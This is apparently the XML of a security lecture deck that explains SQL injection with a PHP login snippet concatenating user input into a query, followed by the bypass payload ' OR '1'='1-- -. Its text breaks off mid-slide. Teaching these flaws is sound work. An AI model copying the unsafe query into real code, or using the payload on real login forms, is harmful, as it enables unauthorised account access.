              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Execution of Uploaded Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Check File Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4276493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1966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SQL INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE8CD63-9946-DBB1-9965-EC5808B72C48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553747" y="1063756"/>
            <a:ext cx="11112759" cy="128753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SQL injection is one of the most common web hacking techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection is the placement of malicious code in SQL statements, via web page input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The root cause of an SQL injection attack is letting the user input to directly be executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F83441-B845-053A-0562-8FB283C71F07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1594" t="3573" r="62188" b="7612"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987136" y="3114961"/>
            <a:ext cx="2888673" cy="1635980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB88345-345F-108C-A352-79AE6FDDA0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4258252" y="3114961"/>
            <a:ext cx="6668078" cy="2789162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4107877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SQL INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F83441-B845-053A-0562-8FB283C71F07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1594" t="3573" r="62188" b="7612"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966853" y="1063756"/>
            <a:ext cx="2888673" cy="1635980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91951F8A-F811-80FD-CDD5-8FDFE5DDF3A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455000" y="2907476"/>
            <a:ext cx="9310254" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$username </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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'username'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password </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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'password'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT * FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' AND password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$conn</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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysqli_num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$result</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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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chemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Login successful</a:t>
            </a:r>
          </a:p>
          <a:p>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rgbClr val="453B81"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Login failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193ED4F8-EB16-B9F8-3F62-610DF4F46F8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8563762" y="6221566"/>
            <a:ext cx="3332964" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>What if we enter ‘ OR ‘1’=‘1-- ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="957105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SQL INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91951F8A-F811-80FD-CDD5-8FDFE5DDF3A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154827" y="2112253"/>
            <a:ext cx="9882345" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$username </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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'' OR '1'='1-- -'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password </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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'password'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT * FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
